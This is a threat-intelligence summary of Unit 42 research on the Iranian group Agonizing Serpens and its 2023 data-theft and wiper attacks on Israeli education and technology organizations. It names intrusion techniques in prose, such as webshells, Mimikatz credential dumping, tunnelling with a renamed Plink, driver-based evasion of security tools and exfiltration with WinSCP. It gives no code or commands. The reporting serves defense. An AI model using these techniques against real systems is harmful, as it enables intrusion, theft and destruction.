Iranian APT Group 'Agonizing Serpens' Campaigns for Data Theft and Destruction

Researchers from Unit 42 have unveiled a series of cyberattacks perpetrated by an Iranian threat group, Agonizing Serpens, also tracked under aliases such as Agrius, BlackShadow, Pink Sandstorm, and DEV-0022. These attacks occurred between January 2023 and October 2023 and exhibited a particular focus on Israeli organizations, notably within the education and technology sectors. Agonizing Serpens was keen on fulfilling objectives between data theft and the deployment of destructive data-wiping malware. Among the wiper malware employed in these attacks, Unit 42 tracks them as MultiLayer, PartialWasher, and BFG Agonizer.

Agonizing Serpens showcased several attack capabilities in its campaigns. These capabilities involved exploiting vulnerable public-facing applications to deploy ASPX webshells. After deployment, the attackers utilized a command-line interpreter for reconnaissance, acquiring user, system, and network context. The group employed various techniques for credential theft, such as password spraying, brute-force attacks over SMB, credential dumping from the registry, and leveraging tools like Mimikatz. To move laterally within the network, they employed a renamed Plink executable, 'system.exe,' to establish communications through remote tunnels. Unit 42 observed multiple attempts by the attackers to circumvent the Cortex XDR platform. These efforts included trying to modify the essential auto-start services that Cortex XDR relies on, as well as exploiting vulnerable drivers (BYOVD).

Before deploying destructive malware, the threat actors gathered data from the environment, particularly targeting SQL databases. They utilized a custom tool named 'sql.net4.exe' for extracting sensitive information from database tables. The collected data was archived using 7-zip and staged in the Windows TEMP folder, with data exfiltration facilitated through tools like WinSCP and PuTTY Secure Copy Protocol (Pscp.exe). The attackers’ deployment of data-wiping malware was meant to cover their tracks and inflict maximum damage against the targeted organization. Unit 42's identified the destructive nature of Agonizing Serpens' attacks to be "congruent with all previous reports about the group’s activity."